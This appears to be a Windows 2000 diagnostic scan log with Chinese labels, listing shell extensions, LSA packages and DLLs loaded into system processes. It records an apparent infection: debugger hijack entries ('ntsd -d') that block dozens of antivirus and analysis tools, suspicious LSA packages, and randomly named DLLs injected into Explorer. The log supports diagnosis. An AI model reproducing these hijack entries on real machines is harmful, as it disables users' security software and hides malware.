O31 - 未知 - SEApproved: {E8BB6DC0-6B4E-11d0-92DB-00A0C90C2BD7} - C:\WINNT\system32\webcheck.dll - Microsoft Corporation - Web Site Monitor - 6.0.2800.1106 - 258048 - 69c04aedf62949d981a71efa2d9a76f7
O31 - 未知 - SEApproved: {7D559C10-9FE9-11d0-93F7-00AA0059CE02} - C:\WINNT\system32\webcheck.dll - Microsoft Corporation - Web Site Monitor - 6.0.2800.1106 - 258048 - 69c04aedf62949d981a71efa2d9a76f7
O31 - 未知 - SEApproved: {E6CC6978-6B6E-11D0-BECA-00C04FD940BE} - C:\WINNT\system32\webcheck.dll - Microsoft Corporation - Web Site Monitor - 6.0.2800.1106 - 258048 - 69c04aedf62949d981a71efa2d9a76f7
O31 - 未知 - SEApproved: {D8BD2030-6FC9-11D0-864F-00AA006809D9} - C:\WINNT\system32\webcheck.dll - Microsoft Corporation - Web Site Monitor - 6.0.2800.1106 - 258048 - 69c04aedf62949d981a71efa2d9a76f7
O31 - 未知 - SEApproved: {7FC0B86E-5FA7-11d1-BC7C-00C04FD929DB} - C:\WINNT\system32\webcheck.dll - Microsoft Corporation - Web Site Monitor - 6.0.2800.1106 - 258048 - 69c04aedf62949d981a71efa2d9a76f7
O31 - 未知 - SEApproved: {8BEBB290-52D0-11D0-B7F4-00C04FD706EC} - C:\WINNT\system32\thumbvw.dll - Microsoft Corporation - Thumbnail View Extension - 5.0.3502.6601 - 187664 - a1f51ae9c2ee70de7668a3437c514631
O31 - 未知 - SEApproved: {EAB841A0-9550-11CF-8C16-00805F1408F3} - C:\WINNT\system32\thumbvw.dll - Microsoft Corporation - Thumbnail View Extension - 5.0.3502.6601 - 187664 - a1f51ae9c2ee70de7668a3437c514631
O31 - 未知 - SEApproved: {1AEB1360-5AFC-11D0-B806-00C04FD706EC} - C:\WINNT\system32\thumbvw.dll - Microsoft Corporation - Thumbnail View Extension - 5.0.3502.6601 - 187664 - a1f51ae9c2ee70de7668a3437c514631
O31 - 未知 - SEApproved: {9DBD2C50-62AD-11D0-B806-00C04FD706EC} - C:\WINNT\system32\thumbvw.dll - Microsoft Corporation - Thumbnail View Extension - 5.0.3502.6601 - 187664 - a1f51ae9c2ee70de7668a3437c514631
O31 - 未知 - SEApproved: {500202A0-731E-11D0-B829-00C04FD706EC} - C:\WINNT\system32\thumbvw.dll - Microsoft Corporation - Thumbnail View Extension - 5.0.3502.6601 - 187664 - a1f51ae9c2ee70de7668a3437c514631
O31 - 未知 - SEApproved: {352EC2B7-8B9A-11D1-B8AE-006008059382} - C:\WINNT\system32\appwiz.cpl - Microsoft Corporation - Shell Application Manager - 5.0.2195.6624 - 301328 - 57920edbc003f186547e7127a119dc00
O31 - 未知 - SEApproved: {0B124F8C-91F0-11D1-B8B5-006008059382} - C:\WINNT\system32\appwiz.cpl - Microsoft Corporation - Shell Application Manager - 5.0.2195.6624 - 301328 - 57920edbc003f186547e7127a119dc00
O31 - 未知 - SEApproved: {CFCCC7A0-A282-11D1-9082-006008059382} - C:\WINNT\system32\appwiz.cpl - Microsoft Corporation - Shell Application Manager - 5.0.2195.6624 - 301328 - 57920edbc003f186547e7127a119dc00
O31 - 未知 - SEApproved: {fe1290f0-cfbd-11cf-a330-00aa00c16e65} - C:\WINNT\system32\dsfolder.dll - Microsoft Corporation - Directory Service UI - 5.0.2195.6601 - 41744 - 9996e5b7a4e0b37235cf4cf6e80daa79
O31 - 未知 - SEApproved: {9E51E0D0-6E0F-11d2-9601-00C04FA31A86} - C:\WINNT\system32\dsfolder.dll - Microsoft Corporation - Directory Service UI - 5.0.2195.6601 - 41744 - 9996e5b7a4e0b37235cf4cf6e80daa79
O31 - 未知 - SEApproved: {8A23E65E-31C2-11d0-891C-00A024AB2DBB} - C:\WINNT\system32\dsquery.dll - Microsoft Corporation - Directory Service Find - 5.0.2195.6622 - 157456 - 82b6edd86a4c5344d43785dfc8e18cb6
O31 - 未知 - SEApproved: {163FDC20-2ABC-11d0-88F0-00A024AB2DBB} - C:\WINNT\system32\dsquery.dll - Microsoft Corporation - Directory Service Find - 5.0.2195.6622 - 157456 - 82b6edd86a4c5344d43785dfc8e18cb6
O31 - 未知 - SEApproved: {F020E586-5264-11d1-A532-0000F8757D7E} - C:\WINNT\system32\dsquery.dll - Microsoft Corporation - Directory Service Find - 5.0.2195.6622 - 157456 - 82b6edd86a4c5344d43785dfc8e18cb6
O31 - 未知 - SEApproved: {0D45D530-764B-11d0-A1CA-00AA00C16E65} - C:\WINNT\system32\dsuiext.dll - Microsoft Corporation - Directory Service Common UI - 5.0.2195.6611 - 110864 - e6de9ea6d2cb04a7f6e13a2b521691ab
O31 - 未知 - SEApproved: {62AE1F9A-126A-11D0-A14B-0800361B1103} - C:\WINNT\system32\dsuiext.dll - Microsoft Corporation - Directory Service Common UI - 5.0.2195.6611 - 110864 - e6de9ea6d2cb04a7f6e13a2b521691ab
O31 - 未知 - SEApproved: {450D8FBA-AD25-11D0-98A8-0800361B1103} - C:\WINNT\system32\mydocs.dll - Microsoft Corporation - My Documents Folder UI - 5.0.3502.6601 - 57104 - 34946facb1e14d39158045f772ee7271
O31 - 未知 - SEApproved: {ECF03A33-103D-11d2-854D-006008059367} - C:\WINNT\system32\mydocs.dll - Microsoft Corporation - My Documents Folder UI - 5.0.3502.6601 - 57104 - 34946facb1e14d39158045f772ee7271
O31 - 未知 - SEApproved: {ECF03A32-103D-11d2-854D-006008059367} - C:\WINNT\system32\mydocs.dll - Microsoft Corporation - My Documents Folder UI - 5.0.3502.6601 - 57104 - 34946facb1e14d39158045f772ee7271
O31 - 未知 - SEApproved: {4a7ded0a-ad25-11d0-98a8-0800361b1103} - C:\WINNT\system32\mydocs.dll - Microsoft Corporation - My Documents Folder UI - 5.0.3502.6601 - 57104 - 34946facb1e14d39158045f772ee7271
O31 - 未知 - SEApproved: {750fdf0e-2a26-11d1-a3ea-080036587f03} - C:\WINNT\system32\cscui.dll - Microsoft Corporation - Client Side Caching UI - 5.0.2195.6705 - 242960 - c468a0ce7f1e749276e3542e84ddf66c
O31 - 未知 - SEApproved: {10CFC467-4392-11d2-8DB4-00C04FA31A66} - C:\WINNT\system32\cscui.dll - Microsoft Corporation - Client Side Caching UI - 5.0.2195.6705 - 242960 - c468a0ce7f1e749276e3542e84ddf66c
O31 - 未知 - SEApproved: {AFDB1F70-2A4C-11d2-9039-00C04F8EEB3E} - C:\WINNT\system32\cscui.dll - Microsoft Corporation - Client Side Caching UI - 5.0.2195.6705 - 242960 - c468a0ce7f1e749276e3542e84ddf66c
O31 - 未知 - SEApproved: {7A80E4A8-8005-11D2-BCF8-00C04F72C717} - C:\WINNT\system32\mmcshext.dll - Microsoft Corporation - MMC Shell Extension DLL - 5.0.2153.1 - 24848 - 2ab64c39b0198618ee8bf5bb0ecbee99
O31 - 未知 - SEApproved: {0CD7A5C0-9F37-11CE-AE65-08002B2E1262} - C:\WINNT\system32\cabview.dll - Microsoft Corporation - Cabinet File Viewer Shell Extension - 5.0.2920.0 - 31504 - c305e89ba8e21e1dfa19190172416fba
O31 - 未知 - SEApproved: {B41DB860-8EE4-11D2-9906-E49FADC173CA} - C:\Program Files\WinRAR\rarext.dll -  -  -  - 124416 - 1b089bd70767a1ca5419a24b581cc753
O31 - 未知 - SEApproved: 无效的CLSID：Shell Extensions for RealOne Player -  -  -  -  - 0 -
O31 - 未知 - SEApproved: 无效的CLSID：vrv -  -  -  -  - 0 -
O31 - 未知 - Directory Menu: {750fdf0e-2a26-11d1-a3ea-080036587f03} - C:\WINNT\system32\cscui.dll - Microsoft Corporation - Client Side Caching UI - 5.0.2195.6705 - 242960 - c468a0ce7f1e749276e3542e84ddf66c
O31 - 未知 - Directory Menu: {A470F8CF-A1E8-4f65-8335-227475AA5C46} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - Directory Menu: {f81e9010-6ea4-11ce-a7ff-00aa003ca9f6} - C:\WINNT\system32\ntshrui.dll - Microsoft Corporation - Shell extensions for sharing - 5.0.2134.1 - 47888 - 89ed3a9e1f760bd30db6da2f93d9e71a
O31 - 未知 - Directory Menu: {C14F7681-33D8-11D3-A09B-00500402F30A} - C:\WINNT\system32\bxymenu.dll -  -  -  - 40960 - 79b41fc17ca741cc368bd32bff77a5b8
O31 - 未知 - Directory Menu: {B41DB860-8EE4-11D2-9906-E49FADC173CA} - C:\Program Files\WinRAR\rarext.dll -  -  -  - 124416 - 1b089bd70767a1ca5419a24b581cc753
O31 - 未知 - Image Execution: 360rpt.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: 360safe.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: 360safebox.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: 360tray.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: adam.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: AgentSvr.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: AppSvc32.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: autoruns.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: avconsol.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: avgrssvc.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: AvMonitor.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: avp.com - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: avp.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: CCenter.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: ccSvcHst.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: ctfmon.exe - C:\WINNT\SoundMan.exe - Realtek Semiconductor Corp. - Realtek Sound Manager - 5.1.0.28 - 67584 - e0584ee5e7f07f04a879b19a37465588
O31 - 未知 - Image Execution: EGHOST.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: FileDsty.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: FTCleanerShell.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: FYFireWall.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: HijackThis.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: IceSword.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: iparmo.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: Iparmor.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: isPwdSvc.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: kabaload.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KaScrScn.SCR - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KASMain.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KASTask.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KAV32.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KAVDX.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KAVPF.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KAVPFW.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KAVSetup.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KAVStart.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KISLnchr.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KMailMon.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KMFilter.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KPFW32.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KPFW32X.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KPfwSvc.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KRegEx.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KRepair.com - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KsLoader.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KVCenter.kxp - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KvDetect.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KvfwMcl.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KVMonXP.kxp - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KVMonXP_1.kxp - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: kvol.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: kvolself.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KvReport.kxp - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KVScan.kxp - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KVSrvXP.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KVStub.kxp - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: kvupload.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: kvwsc.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KvXP.kxp - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KvXP_1.kxp - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KWatch.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KWatch9x.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KWatchX.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: MagicSet.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: mcconsol.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: mmqczj.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: mmsk.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: Navapsvc.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: Navapw32.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: nod32.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: nod32krn.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: nod32kui.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: NPFMntor.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: OllyDBG.EXE - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: OllyICE.EXE - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: PFW.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: PFWLiveUpdate.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: procexp.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: QHSET.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: QQDoctor.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: QQKav.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: Ras.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: RavMonD.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: RavStub.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: RawCopy.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: RegClean.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: RegTool.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: rfwcfg.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: rfwmain.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: rfwProxy.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: rfwsrv.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: rfwstub.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: RsAgent.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: Rsaupd.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: runiep.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: safebank.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: safeboxTray.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: safelive.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: scan32.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: shcfg32.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: SmartUp.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: SREng.EXE - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: symlcsvc.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: SysSafe.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: TrojanDetector.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: Trojanwall.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: TrojDie.kxp - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: UIHost.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: UmxAgent.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: UmxAttachment.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: UmxCfg.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: UmxFwHlp.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: UmxPol.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: UpLive.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: vsstat.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: webscanx.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: WinDbg.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: WoptiClean.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - LSA: Authentication Packages - C:\WINNT\system32\msv1_0.dll - Microsoft Corporation - Microsoft Authentication Package v1.0 - 5.0.2195.6926 - 125200 - 1dfa06dea950dff34c57d04b7392d29e
O31 - 未知 - LSA: Notification Packages - C:\WINNT\system32\FPNWCLNT.dll - Microsoft Corporation - FPNW Client DLL - 5.0.2134.1 - 35152 - 9b4d464f0027a23bb82e7d9abec48631
O31 - 未知 - LSA: Notification Packages - ASSFM.dll -  -  -  - 0 -
O31 - 未知 - LSA: Notification Packages - DCSVC.dll -  -  -  - 0 -
O31 - 未知 - LSA: Notification Packages - cecli.dll -  -  -  - 0 -
O31 - 未知 - LSA: Security Packages - C:\WINNT\system32\kerberos.dll - Microsoft Corporation - Kerberos Security Package - 5.0.2195.7053 - 208144 - 3ed2ac7e999788ea1806ad51e48fdf70
O31 - 未知 - LSA: Security Packages - sv1_0.dll -  -  -  - 0 -
O31 - 未知 - LSA: Security Packages - channel.dll -  -  -  - 0 -
=======================================
O40 - winlogon.exe - Microsoft Corporation - C:\WINNT\system32\sfcfiles.dll - Windows 2000 System File Checker - 3d30ab66e13c66712d088e8c291e8c97
O40 - winlogon.exe - Microsoft Corporation - C:\WINNT\system32\mscat32.dll - MSCAT32 Forwarder DLL - 8fa5a78ab9b12c18b6ef8a839edff012
O40 - winlogon.exe - Microsoft Corporation - C:\WINNT\system32\wzcdlg.dll - Wireless Zero Configuration Service UI - 752c43e74027c22db1d1ef45431c1552
O40 - winlogon.exe - Microsoft Corporation - C:\WINNT\system32\LZ32.DLL - LZ Expand/Compress API DLL - 51a5945c1e03a2d1761bcfd7e373d513
O40 - services.exe - Microsoft Corporation - C:\WINNT\system32\ICMP.dll - ICMP DLL - 5e30628a4f5a02b80718aa46c92e00ae
O40 - services.exe - Microsoft Corporation - C:\WINNT\system32\msgsvc.dll - NT Messenger Service - 40acca5df8ed2c90c57a4907779dccae
O40 - services.exe - Microsoft Corporation - C:\WINNT\system32\wmicore.dll - WMI service core functionality - 65a14fb350e366df6278fcb299653abb
O40 - services.exe - Microsoft Corporation - C:\WINNT\system32\msafd.dll - Microsoft Windows Sockets 2.0 Service Provider - 29d56fdbb0e97e63ffeda26f988187a5
O40 - services.exe - Microsoft Corporation - C:\WINNT\system32\appmgmts.dll - Software installation Service - 59e2f2a7415facd6f8f69ed3ce885f6b
O40 - lsass.exe - Microsoft Corporation - C:\WINNT\system32\ICMP.dll - ICMP DLL - 5e30628a4f5a02b80718aa46c92e00ae
O40 - lsass.exe - Microsoft Corporation - C:\WINNT\system32\rsabase.dll - Microsoft Base Cryptographic Provider (Export Version) - 99cc1857e220543e0e63a792dfb7e228
O40 - lsass.exe - Microsoft Corporation - C:\WINNT\system32\RASSFM.dll - Remote Access Subauthentication dll - 9f0fd7c5dc8f9cb68f324eed8bd721af
O40 - lsass.exe - Microsoft Corporation - C:\WINNT\system32\SFMAPI.dll - Windows NT Macintosh File Service Client - 59bc7f08335e17ae19a50f2ee6bc343c
O40 - lsass.exe - Microsoft Corporation - C:\WINNT\system32\KDCSVC.dll - KDC Service - dd0d6ce4fded8d18461aa0b96207577a
O40 - lsass.exe - Microsoft Corporation - C:\WINNT\system32\NTDSA.dll - NT5DS - dd716f3e6ac9635e226794fcb42042b2
O40 - lsass.exe - Microsoft Corporation - C:\WINNT\system32\NTDSATQ.dll - Asynchronous Thread Queue - 80bc18a21a36f9edaf2f2fe3fb4d746d
O40 - lsass.exe - Microsoft Corporation - C:\WINNT\system32\polagent.dll - IPSec Policy Agent Service - 24afcba6cab4513aa65563cda47c2a38
O40 - lsass.exe - Microsoft Corporation - C:\WINNT\system32\MFC42u.DLL - MFCDLL Shared Library - Retail Version - c37ddf7aa6792a00984f60bf6bddb709
O40 - lsass.exe - Microsoft Corporation - C:\WINNT\system32\msafd.dll - Microsoft Windows Sockets 2.0 Service Provider - 29d56fdbb0e97e63ffeda26f988187a5
O40 - svchost.exe - Microsoft Corporation - C:\WINNT\system32\msafd.dll - Microsoft Windows Sockets 2.0 Service Provider - 29d56fdbb0e97e63ffeda26f988187a5
O40 - svchost.exe - Microsoft Corporation - C:\WINNT\System32\rnr20.dll - Windows Socket2 NameSpace DLL - bfe16d8857604b624607a7a9d066bf15
O40 - svchost.exe - Microsoft Corporation - C:\WINNT\system32\ICMP.dll - ICMP DLL - 5e30628a4f5a02b80718aa46c92e00ae
O40 - svchost.exe - Microsoft Corporation - C:\WINNT\System32\wshnetbs.dll - Netbios Windows Sockets Helper DLL - 6d542cd4a296d4535c6ae359689d49f4
O40 - svchost.exe - Microsoft Corporation - c:\winnt\system32\TxfAux.Dll - Support routines for TXF - 2e98c92cab718d233c47042770666817
O40 - svchost.exe - Microsoft Corporation - c:\winnt\system32\ntmssvc.dll - Removable Storage Service - 52b0d055049c59694a92ba4b0604b0e2
O40 - svchost.exe - Microsoft Corporation - C:\WINNT\system32\ICMP.dll - ICMP DLL - 5e30628a4f5a02b80718aa46c92e00ae
O40 - svchost.exe - Microsoft Corporation - C:\WINNT\system32\ipbootp.dll - IP BOOTP - 34d553251f6ce21eb5dde9a89c4966ca
O40 - svchost.exe - Microsoft Corporation - C:\WINNT\system32\NTMSDBA.dll - Removable Storage Manager DB Object APIs - 24c6ec2518becfcce21bf6a3a6cc4a0a
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\INDICDLL.dll - Keyboard Language Indicator Shell Hook Extension - 0416ddc2575d4afa613a3690a0a73e4a
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\dsquery.dll - Directory Service Find - 82b6edd86a4c5344d43785dfc8e18cb6
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\dsuiext.dll - Directory Service Common UI - e6de9ea6d2cb04a7f6e13a2b521691ab
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\mmcshext.dll - MMC Shell Extension DLL - 2ab64c39b0198618ee8bf5bb0ecbee99
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\MFC42u.DLL - MFCDLL Shared Library - Retail Version - c37ddf7aa6792a00984f60bf6bddb709
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\MSVCP50.dll - Microsoft (R) C++ Runtime Library - ff69b8824a697d73c3b23a82c575867d
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\hhsetup.dll - Microsoft? HTML Help - 74cd91ee65a290fcc76fe1417023a591
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\docprop2.dll - DocProp2 - a4769f665cdd13f51b1e20013bb8a21f
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\MSVFW32.DLL - Microsoft Video for Windows DLL - 496e359ce07594bf98aef35fa173ae59
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\AVIFIL32.DLL - Microsoft AVI File support library - 8abed880eeecf036118c814a1f5b2aa7
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\faxshell.dll - Fax Tiff Data Column Provider - 9dc8a8c3d8cbb925796aca18fd7cd7a5
O40 - Explorer.EXE -  - C:\WINNT\system32\msosiocp.dll -  - c00cbed127ef717308a2adba6d2d3a29
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\LZ32.DLL - LZ Expand/Compress API DLL - 51a5945c1e03a2d1761bcfd7e373d513
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\msafd.dll - Microsoft Windows Sockets 2.0 Service Provider - 29d56fdbb0e97e63ffeda26f988187a5
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\System32\rnr20.dll - Windows Socket2 NameSpace DLL - bfe16d8857604b624607a7a9d066bf15
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\ICMP.dll - ICMP DLL - 5e30628a4f5a02b80718aa46c92e00ae
O40 - Explorer.EXE -  - C:\WINNT\system32\WSockDrv32.dll -  - 2cf330af1db13b5c24022cb5975ce22d
O40 - Explorer.EXE -  - C:\WINNT\system32\MsIMMs32.dll -  - ea429067ffe1377e6aba776de72972ab
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\eipwdjowow.dll - Windows XP MSPLAY API DLL - d8b92f8d1353efad84a9b0e7a30caa70
O40 - Explorer.EXE -  - C:\WINNT\system32\AVPSrv.dll -  - 008a1bf82e58ab7c8ba097daf332be46
O40 - Explorer.EXE -  - C:\WINNT\system32\upxdnd.dll -  - 1a431c17e3e382e8346a5a03fba54b7e
O40 - Explorer.EXE -  - C:\WINNT\system32\tciocp32.dll -  - 128d92e87fb8fa1cf26bd938d7cafabb
O40 - Explorer.EXE -  - C:\WINNT\system32\xgnfn.dll -  - 1feb902c9e6697d0ae55d040004e85db
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\vagnydjwm.dll - Windows XP MSPLAY API DLL - 05ead05e62bc041d495b23d41006d2f2
O40 - Explorer.EXE -  - C:\WINNT\system32\msccrt.dll -  - fb41ed5230b123ce9242558700698fb9
O40 - Explorer.EXE -  - C:\WINNT\system32\DbgHlp32.dlL -  - 7e76fd8bffaa744276fa236a486ee9e5
O40 - Explorer.EXE -  - C:\WINNT\system32\cmdbcs.dll -  - 70f49152f02bd8f594670b79047a5d0a
O40 - Explorer.EXE -  - C:\WINNT\system32\klvtuwvr.dll -  - 3bf4b68236ad2a66ebc278137fd7f73b
O40 - Explorer.EXE -  - C:\WINNT\system32\PTSShell.dll -  - d94f215968e91b2c27472cba1237ae47
O40 - Explorer.EXE -  - C:\WINNT\system32\LotusHlp.dll -  - 5cb077dd7ad75c4274213214137b93da
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\agntekpdj.dll - Windows XP MSPLAY API DLL - 3e19906f2cdb977557bc44845a336034
O40 - Explorer.EXE -  - C:\WINNT\system32\Kvsc3.dll -  - c23cfc0f999ef78e3ea7703e14b1d3c0
O40 - Explorer.EXE -  - C:\WINNT\system32\pahzij.dll -  - ca5e213d28e213537eb3debf28163ae7
O40 - Explorer.EXE -  - C:\WINNT\system32\WINSvr32.dll -  - 2044393056fb0c2c0ad42fc351fa4a3d
O40 - Explorer.EXE -  - C:\WINNT\system32\xfgnxfn.dll -  - 00ac8155800a8a9e5572daefb01c6f18
O40 - Explorer.EXE -  - C:\WINNT\system32\jwlah.dll -  - 0f35e25bb3598812a32a461abf7f2229
O40 - Explorer.EXE -  - C:\WINNT\system32\hgfhk.dll -  - 6fff2e6a214d8d0ed86450ad53751ae4
O40 - Explorer.EXE -  - C:\WINNT\system32\duygnef.dll -  - 4723137fc6dc58aa4be6d30c45efc6cb
O40 - Explorer.EXE -  - C:\WINNT\system32\zfdzb.dll -  - fc838483660b00b366e8f93752e301ad
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\c_is2022.dll - ISO-2022 Code Page Translation DLL - c8ec660fa1a8ca99302ab607e9409e38
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\diskcopy.dll - Windows DiskCopy - df03f95f5216e6d612f7925c83c2c263
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\ddrawex.dll - Direct Draw Ex - 3c173d9de39c70822c87d11dd81ca79c
